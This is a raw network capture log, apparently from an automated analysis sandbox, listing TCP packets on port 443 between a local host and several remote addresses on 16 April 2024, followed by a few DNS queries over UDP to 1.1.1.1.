Apr 16, 2024 11:44:01.477423906 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477638006 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477669001 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477695942 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477715969 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.477725029 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477739096 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.478468895 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.478504896 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.478516102 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.478522062 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.478550911 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.478564024 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.478571892 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.478682041 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.478688002 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.478694916 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.478797913 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.479389906 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.479437113 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.479486942 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.479509115 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.479528904 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.479538918 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.479557037 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.480326891 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.480355978 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.480387926 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.480406046 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.480413914 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.480424881 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.480436087 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.480463982 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.480470896 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.480712891 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.480793953 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.481213093 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.481220007 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.481232882 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.481262922 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.481282949 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.481292009 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.481317043 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.481337070 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.481338024 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.481347084 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.481353998 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.481381893 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.481389046 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.481396914 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.481492043 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.481507063 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.482026100 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.482145071 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.482171059 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.482214928 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.482223034 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.482270002 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.482942104 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.483006954 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.522501945 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.522514105 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.522514105 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.522516012 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.522522926 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.580948114 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.581043005 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.581084967 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.581146955 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.581199884 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.581253052 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.582155943 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.582228899 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.582271099 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.582324028 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.582812071 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.582889080 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.582926989 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.582983017 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.583904982 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.583978891 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.584695101 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.584767103 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.584813118 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.584880114 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.585575104 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.585640907 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.585685015 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.585738897 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.586425066 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.586488008 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.587600946 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.587682009 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.587716103 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.587786913 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.588188887 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.588254929 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.633656025 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.638947010 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.638968945 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.640428066 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.641531944 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.641531944 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.641531944 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.641617060 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.671293974 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.671412945 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.671475887 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.671493053 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.671547890 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.672806978 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.672826052 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.677248001 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.677422047 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.677483082 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.678359985 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.678388119 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.678416967 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.678523064 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.678558111 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.678597927 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.678607941 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.678621054 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.678666115 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.678695917 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.678792000 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.681941032 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.681965113 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.685390949 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.685472012 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.685604095 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.685643911 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.685658932 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.685664892 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.685678005 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.686274052 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.686290979 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.686494112 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.686544895 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.686552048 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.686587095 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.686620951 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.686717987 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.687381029 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.687419891 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.687441111 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.687448025 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.687465906 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.687690020 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.687704086 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.688216925 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.688265085 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.688271999 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.688283920 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.688330889 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.689070940 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.689086914 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.699080944 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.699086905 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.707215071 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.707395077 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.707519054 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.708724976 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.708736897 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.725526094 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.843285084 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.843487024 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.843704939 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.855940104 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.855962992 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:02.383075953 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:02.383150101 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:02.383229017 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:02.383457899 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:02.383469105 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:02.611215115 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:02.611648083 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:02.611679077 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:02.613338947 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:02.613426924 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:02.614466906 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:02.614550114 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:02.661742926 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:02.661768913 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:02.708139896 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:03.615320921 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 16, 2024 11:44:06.261265039 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.261360884 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.261612892 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.266038895 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.266078949 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.491812944 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.491903067 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.497322083 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.497368097 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.497844934 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.539380074 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.540045977 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.580115080 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.687870026 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.688040972 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.688211918 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.688211918 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.688211918 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.688306093 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.731139898 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.731184959 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.731260061 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.731650114 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.731666088 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.948132038 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.948261976 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.949544907 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.949561119 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.949892998 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.951873064 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.992125988 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:06.997136116 CEST	49735	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:06.997169971 CEST	443	49735	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:07.155267000 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:07.155452967 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:07.155602932 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:07.156086922 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:07.156086922 CEST	49736	443	192.168.2.7	23.63.206.91
Apr 16, 2024 11:44:07.156114101 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:07.156126022 CEST	443	49736	23.63.206.91	192.168.2.7
Apr 16, 2024 11:44:07.369147062 CEST	49674	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:44:07.369446039 CEST	49675	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:44:07.509021044 CEST	49672	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:44:07.625793934 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 16, 2024 11:44:08.007179976 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 16, 2024 11:44:08.419328928 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 16, 2024 11:44:08.756455898 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 16, 2024 11:44:08.892921925 CEST	443	49698	104.98.116.138	192.168.2.7
Apr 16, 2024 11:44:08.893021107 CEST	49698	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:44:10.255458117 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 16, 2024 11:44:12.621901989 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:12.621972084 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:12.622164011 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:13.242711067 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 16, 2024 11:44:13.595619917 CEST	49733	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:44:13.595669031 CEST	443	49733	142.250.9.103	192.168.2.7
Apr 16, 2024 11:44:15.798892975 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:15.798937082 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:15.799069881 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:15.800303936 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:15.800319910 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:16.429874897 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:16.429960966 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:16.433726072 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:16.433736086 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:16.433994055 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:16.474339008 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:16.846812010 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:16.888120890 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255395889 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255462885 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255491972 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255520105 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.255532026 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255563974 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255564928 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.255587101 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255597115 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.255623102 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.255635977 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.255743980 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255815983 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.255826950 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255935907 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.255995989 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.499088049 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.499119043 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:17.499125957 CEST	49737	443	192.168.2.7	40.68.123.157
Apr 16, 2024 11:44:17.499131918 CEST	443	49737	40.68.123.157	192.168.2.7
Apr 16, 2024 11:44:18.022384882 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 16, 2024 11:44:19.209079027 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 16, 2024 11:44:31.127918959 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 16, 2024 11:44:54.158550024 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:54.158584118 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:54.158751011 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:54.159111023 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:54.159126043 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:54.675811052 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:54.676147938 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:54.680141926 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:54.680166960 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:54.680660963 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:54.688146114 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:54.732120991 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.167963982 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168025970 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168068886 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168107033 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.168132067 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168144941 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.168178082 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.168250084 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168303967 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168317080 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.168323040 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168370962 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.168378115 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168412924 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.168458939 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.170258045 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.170269012 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:44:55.170290947 CEST	49741	443	192.168.2.7	20.114.59.183
Apr 16, 2024 11:44:55.170295954 CEST	443	49741	20.114.59.183	192.168.2.7
Apr 16, 2024 11:45:02.331249952 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:02.331337929 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:02.331438065 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:02.331702948 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:02.331727028 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:02.551525116 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:02.551969051 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:02.552031994 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:02.553226948 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:02.553670883 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:02.553862095 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:02.604650021 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:12.556560993 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:12.556699038 CEST	443	49743	142.250.9.103	192.168.2.7
Apr 16, 2024 11:45:12.557082891 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:14.511296988 CEST	49743	443	192.168.2.7	142.250.9.103
Apr 16, 2024 11:45:14.511363983 CEST	443	49743	142.250.9.103	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 16, 2024 11:43:57.688565969 CEST	51425	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:57.688566923 CEST	57357	53	192.168.2.7	1.1.1.1
Apr 16, 2024 11:43:57.798244953 CEST	53	51425	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:57.812517881 CEST	53	57357	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:57.844041109 CEST	53	51595	1.1.1.1	192.168.2.7
Apr 16, 2024 11:43:57.909924984 CEST	53	50619	1.1.1.1	192.168.2.7
